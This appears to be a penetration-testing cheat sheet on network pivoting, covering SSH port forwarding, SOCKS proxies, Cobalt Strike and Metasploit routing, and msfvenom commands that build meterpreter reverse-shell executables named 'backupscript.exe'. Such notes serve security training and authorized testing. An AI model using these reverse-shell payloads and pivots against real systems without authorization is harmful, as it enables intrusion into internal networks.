Dynamic Port Forwarding (SSH + Socks)

Local Port Forward SSH

It sends the data from <local-port> to <remote-port on the target server.

# Local Port -> Can be any port
# Remote Port -> The port where the target service is listening on
ssh -L <local-port>:127.0.0.1:<remote-port>

# Confirm Port Forwarding
netstat -antp | grep <localport>

# Forwarding Several Ports
ssh -L <local-port>:localhost:<remote-port> <local-port>:localhost:<remote-port> <user>@<IP>

SSH Tunneling over SOCKS Proxy

# SSH Command
ssh -D 1080 <user>@<IP>

# Check Proxychains Conf File
/etc/proxychains.conf
socks4 127.0.0.1 1080

Reverse Port Forwarding SSH

# Generate Reverse Shell, with the IP of the internal host.
msfvenom -p windows/x64/meterpreter/reverse_https lhost= <InternalIPofPivotHost> -f exe -o backupscript.exe LPORT=8080

# Set lport 8000
# set lhost 127.0.0.1

# Reverse Port Forward
ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN

Cobalt Tunneling & Port Forwarding

# Socks4 Proxy
socks 1080

# socks5
socks 1080 socks5 disableNoAuth socks_user socks_password enableLogging

# Reverse Port Forward
rportfwd

MSF Socks Proxy

use auxiliary/server/socks_proxy
set srvport 1080
set servhost 0.0.0.0
set version 4a

# Verify Proxy runs
jobs

Metasploit Autoroute

use post/multi/manage/autoroute
set session <session id>
set subnet <ip>
run

# Shorter Method
run autoroute -s <ip>/24

Metasploit Port Forwarding

portfwd add -l <local-port> -p <remote-port> -r <ip>

Metasploit Reverse Forwarding

portfwd add -R -l <local-port> -p <remote-port> -L <tun0>

# Setup Listener
set payload windows/x64/meterpreter/reverse_tcp
set lport <value -l>
set lhost 0.0.0.0
run

# Create Payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<pivot-ip> -f exe -o backupscript.exe LPORT=<remote-port>

PreviousAdvanced Tunneling Methods NextPort Forwarding Tools

Last updated 1 year ago